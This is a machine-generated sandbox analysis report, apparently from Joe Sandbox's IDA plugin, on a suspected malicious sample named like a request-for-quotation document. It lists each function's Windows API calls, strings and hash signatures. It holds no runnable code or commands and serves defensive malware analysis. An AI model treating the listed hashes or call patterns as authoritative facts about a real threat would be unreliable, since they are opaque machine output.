                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0016DA03
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0016DA24
                                              • ShowWindow.USER32(00000003,00000000), ref: 0016DA43
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0016DA68
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0016DA8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID: @U=u
                                              • API String ID: 1211466189-2594219639
                                              • Opcode ID: 90642a6964b9f882fe715e806c1fe7266f1224dad9a2b22db1ff168722699a85
                                              • Instruction ID: 6108394ae86c68b98d6b400d4458604f708b21aceef7f05804bc46b7f886579a
                                              • Opcode Fuzzy Hash: 90642a6964b9f882fe715e806c1fe7266f1224dad9a2b22db1ff168722699a85
                                              • Instruction Fuzzy Hash: 78B19971A04225EFDF18CF68D9897BD7BB1FF08705F098069EC499B295D734A9A0CB90
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • CoInitialize.OLE32 ref: 00158718
                                              • CoUninitialize.OLE32 ref: 00158723
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00172BEC,?), ref: 00158783
                                              • IIDFromString.OLE32(?,?), ref: 001587F6
                                              • VariantInit.OLEAUT32(?), ref: 00158890
                                              • VariantClear.OLEAUT32(?), ref: 001588F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 64b9a82efffbe7257b6c014ed643540511d63a84e837602b06b162ec7faa5394
                                              • Instruction ID: aa2a255e8982b846bd674626a8727e3dadbfb75376aba8feb60cce36bb519cc7
                                              • Opcode Fuzzy Hash: 64b9a82efffbe7257b6c014ed643540511d63a84e837602b06b162ec7faa5394
                                              • Instruction Fuzzy Hash: 9461BE70608311EFD710DF24C849B6ABBE8EF88715F10481DF9A5AB291CB70ED48CB92
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 000E2EAE
                                                • Part of subcall function 000E1DB3: GetClientRect.USER32(?,?), ref: 000E1DDC
                                                • Part of subcall function 000E1DB3: GetWindowRect.USER32(?,?), ref: 000E1E1D
                                                • Part of subcall function 000E1DB3: ScreenToClient.USER32(?,?), ref: 000E1E45
                                              • GetDC.USER32 ref: 0011CF82
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0011CF95
                                              • SelectObject.GDI32(00000000,00000000), ref: 0011CFA3
                                              • SelectObject.GDI32(00000000,00000000), ref: 0011CFB8
                                              • ReleaseDC.USER32(?,00000000), ref: 0011CFC0
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0011D04B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: @U=u$U
                                              • API String ID: 4009187628-4110099822
                                              • Opcode ID: 0351cdd5c954c3ce2bafc0231fe7230fe15b94a2aa7f2168ee6000659ad57b7c
                                              • Instruction ID: 703c347b0ee6fb825894f872bb11c407f3835c1ed28e8eecff423f0db20369fc
                                              • Opcode Fuzzy Hash: 0351cdd5c954c3ce2bafc0231fe7230fe15b94a2aa7f2168ee6000659ad57b7c
                                              • Instruction Fuzzy Hash: 5271B030400245DFCF298F64DC84AEA7BBAFF49350F14427AFD556A2A6C73188D2DBA1
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 00155AA6
                                              • inet_addr.WSOCK32(?,?,?), ref: 00155AEB
                                              • gethostbyname.WSOCK32(?), ref: 00155AF7
                                              • IcmpCreateFile.IPHLPAPI ref: 00155B05
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00155B75
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00155B8B
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00155C00
                                              • WSACleanup.WSOCK32 ref: 00155C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: e216ba9dbcdbf68bc2640e5440a6efcd7b1728876c97de94226f20b456f9c21b
                                              • Instruction ID: 08f8e2feeb273dd795127bcb7e21829d0004e858b2e60c08aceaac2094ec42e4
                                              • Opcode Fuzzy Hash: e216ba9dbcdbf68bc2640e5440a6efcd7b1728876c97de94226f20b456f9c21b
                                              • Instruction Fuzzy Hash: 6951B131604701DFDB10EF25DC59B6ABBE6EF48311F14892AF965EB2A1DB70E844CB42
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                                • Part of subcall function 000E2344: GetCursorPos.USER32(?), ref: 000E2357
                                                • Part of subcall function 000E2344: ScreenToClient.USER32(001A67B0,?), ref: 000E2374
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000001), ref: 000E2399
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000002), ref: 000E23A7
                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0016C2E4
                                              • ImageList_EndDrag.COMCTL32 ref: 0016C2EA
                                              • ReleaseCapture.USER32 ref: 0016C2F0
                                              • SetWindowTextW.USER32(?,00000000), ref: 0016C39A
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0016C3AD
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0016C48F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                              • API String ID: 1924731296-2104563098
                                              • Opcode ID: a96d179c309407dec824b3df0a81ef31777bc25e5ba6f176906bb8a45792d93e
                                              • Instruction ID: 5c575819e4486b4a73f3da62f50ec8fdcb63ac74ac7ecd8e9a79faebe0e239e8
                                              • Opcode Fuzzy Hash: a96d179c309407dec824b3df0a81ef31777bc25e5ba6f176906bb8a45792d93e
                                              • Instruction Fuzzy Hash: A5518C74204304AFD700EF24DC95FAA7BE5FB88310F04892DF5A59B2E2DB70A995CB52
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014B73B
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0014B7B1
                                              • GetLastError.KERNEL32 ref: 0014B7BB
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0014B828
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 3960a6c5f7a3c5c79c485c9e0e6cc2e2451c5ae1f3e4e5dfddd6fb51ecd56c72
                                              • Instruction ID: b6777e6003faba9755ea5b35ac802cc1cf3303789c9e49fa961915884d4fdfc5
                                              • Opcode Fuzzy Hash: 3960a6c5f7a3c5c79c485c9e0e6cc2e2451c5ae1f3e4e5dfddd6fb51ecd56c72
                                              • Instruction Fuzzy Hash: D6318F35A042099FDB00EF64DCC5AEE7BB8FF84751F148029E806A72E2DB71D946CB91
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 0016645A
                                              • GetDC.USER32(00000000), ref: 00166462
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0016646D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00166479
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001664B5
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001664C6
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00169299,?,?,000000FF,00000000,?,000000FF,?), ref: 00166500
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00166520
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID: @U=u
                                              • API String ID: 3864802216-2594219639
                                              • Opcode ID: 7628a246f13645ec9a7ed421e767fc5dc0b8e8c5457338fd0719fe1ce0511ad4
                                              • Instruction ID: acb0de18a0542763a4439b51281c249ee59b1d1a5ad309a815a08bce8c23111f
                                              • Opcode Fuzzy Hash: 7628a246f13645ec9a7ed421e767fc5dc0b8e8c5457338fd0719fe1ce0511ad4
                                              • Instruction Fuzzy Hash: B0316F76101214BFEB118F50DC4AFEA3FA9EF09761F044069FE099A1A1D7B59C92CB74
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00158BEC
                                              • CoInitialize.OLE32(00000000), ref: 00158C19
                                              • CoUninitialize.OLE32 ref: 00158C23
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00158D23
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00158E50
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00172C0C), ref: 00158E84
                                              • CoGetObject.OLE32(?,00000000,00172C0C,?), ref: 00158EA7
                                              • SetErrorMode.KERNEL32(00000000), ref: 00158EBA
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00158F3A
                                              • VariantClear.OLEAUT32(?), ref: 00158F4A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: af4f65398b33a181d1f17af55efedccec5a10b6f1245b7bc58f488c67cbf13d1
                                              • Instruction ID: bbd23c87e97076d2adcf8614af5e18466eb51c019d90c692e103419bc12886a2
                                              • Opcode Fuzzy Hash: af4f65398b33a181d1f17af55efedccec5a10b6f1245b7bc58f488c67cbf13d1
                                              • Instruction Fuzzy Hash: 8AC12571208305EFC700DF64C88496AB7E9FF89349F00495DF99AAB251DB71ED0ACB52
                                              APIs
                                              • __swprintf.LIBCMT ref: 0014419D
                                              • __swprintf.LIBCMT ref: 001441AA
                                                • Part of subcall function 001038D8: __woutput_l.LIBCMT ref: 00103931
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 001441D4
                                              • LoadResource.KERNEL32(?,00000000), ref: 001441E0
                                              • LockResource.KERNEL32(00000000), ref: 001441ED
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0014420D
                                              • LoadResource.KERNEL32(?,00000000), ref: 0014421F
                                              • SizeofResource.KERNEL32(?,00000000), ref: 0014422E
                                              • LockResource.KERNEL32(?), ref: 0014423A
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0014429B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: 993120bc3d940447d5a220b471124684ef672c1e57f29ba173480b1781d52f01
                                              • Instruction ID: 77f966672e748ac0a5f6f539da381fbbcb6da19edea9a966857a51fdeff277d5
                                              • Opcode Fuzzy Hash: 993120bc3d940447d5a220b471124684ef672c1e57f29ba173480b1781d52f01
                                              • Instruction Fuzzy Hash: 0A318172A0521AAFDB119F60EC58EBF7BADFF09301F004529F915D2560D7B0DA92CBA4
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00141700
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00140778,?,00000001), ref: 00141714
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0014171B
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00140778,?,00000001), ref: 0014172A
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0014173C
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00140778,?,00000001), ref: 00141755
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00140778,?,00000001), ref: 00141767
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00140778,?,00000001), ref: 001417AC
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00140778,?,00000001), ref: 001417C1
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00140778,?,00000001), ref: 001417CC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: 0444a1ca31706938ecc634d93eb3ecabb9ec9b981642edba6bdb56f51e6e5f9a
                                              • Instruction ID: 15d5a1e354255716d7ba779cdc7a58aed0c433bab4d151c1118a01211c7c3410
                                              • Opcode Fuzzy Hash: 0444a1ca31706938ecc634d93eb3ecabb9ec9b981642edba6bdb56f51e6e5f9a
                                              • Instruction Fuzzy Hash: D8319175604204BFEB129F14ED84F797BE9EB56722F104029F914C6AF0E7B49EC18B61
                                              APIs
                                              • EnumChildWindows.USER32(?,0013AA64), ref: 0013A9A2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: 33bcd6bfdcf547577e8886a951d30e7791586829298dc1e7341e009d6c4b5b33
                                              • Instruction ID: 45f571a9b8142cd0a6e2e44b664ed3055ce99a3631ba616123f305aca0c97b81
                                              • Opcode Fuzzy Hash: 33bcd6bfdcf547577e8886a951d30e7791586829298dc1e7341e009d6c4b5b33
                                              • Instruction Fuzzy Hash: 5F91A530A0020AEBDF18DFA0C481BE9FB74BF14314F918119D9DAB7191DF706A59CBA1
                                              APIs
                                              • IsWindow.USER32(00F154E0), ref: 0016B6A5
                                              • IsWindowEnabled.USER32(00F154E0), ref: 0016B6B1
                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0016B795
                                              • SendMessageW.USER32(00F154E0,000000B0,?,?), ref: 0016B7CC
                                              • IsDlgButtonChecked.USER32(?,?), ref: 0016B809
                                              • GetWindowLongW.USER32(00F154E0,000000EC), ref: 0016B82B
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0016B843
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID: @U=u
                                              • API String ID: 4072528602-2594219639
                                              • Opcode ID: dcd42f8eef26e53701959d81bfee4eff448229a5890f27e15d6e98dfb8230119
                                              • Instruction ID: 40cc717ef45af259718cb403037dbfab6cc76d524aa59036b84cd04b71cd8ad8
                                              • Opcode Fuzzy Hash: dcd42f8eef26e53701959d81bfee4eff448229a5890f27e15d6e98dfb8230119
                                              • Instruction Fuzzy Hash: 14718D74608204AFDB249F64CCD4FBABBB9FF89300F154069E956D72A1C731A9E1CB50
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00167093
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 001670A7
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001670C1
                                              • _wcscat.LIBCMT ref: 0016711C
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00167133
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00167161
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: @U=u$SysListView32
                                              • API String ID: 307300125-1908207174
                                              • Opcode ID: 0908c6c39ac619bb962a3b845a218448b83467fe45eb513388e854261502fa58
                                              • Instruction ID: 6b30e84ccdf5cf714e3d52af8e6f11ccef842617d206712bb97c4442a2d0b409
                                              • Opcode Fuzzy Hash: 0908c6c39ac619bb962a3b845a218448b83467fe45eb513388e854261502fa58
                                              • Instruction Fuzzy Hash: C741D270A04308AFEB21DFA4DC85BEE77A8EF09354F10042AF594E71D2D7719D948B60
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0016655B
                                              • GetWindowLongW.USER32(00F154E0,000000F0), ref: 0016658E
                                              • GetWindowLongW.USER32(00F154E0,000000F0), ref: 001665C3
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001665F5
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0016661F
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00166630
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0016664A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID: @U=u
                                              • API String ID: 2178440468-2594219639
                                              • Opcode ID: e1f2be3b47e9a32b4f156590c4c40a00ee364e621167a3d36f114b1a6fa8790d
                                              • Instruction ID: 9616059d636fdf3bd301c2aba46c69c6bdd2fe17bf5b6ff9b664310a1e53fcae
                                              • Opcode Fuzzy Hash: e1f2be3b47e9a32b4f156590c4c40a00ee364e621167a3d36f114b1a6fa8790d
                                              • Instruction Fuzzy Hash: 40312431604250AFDB20CF28EC86F553BE5FB4A750F1901A8F9128B6B5CB71ACA1DB91
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0016F910), ref: 0015903D
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0016F910), ref: 00159071
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001591EB
                                              • SysFreeString.OLEAUT32(?), ref: 00159215
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
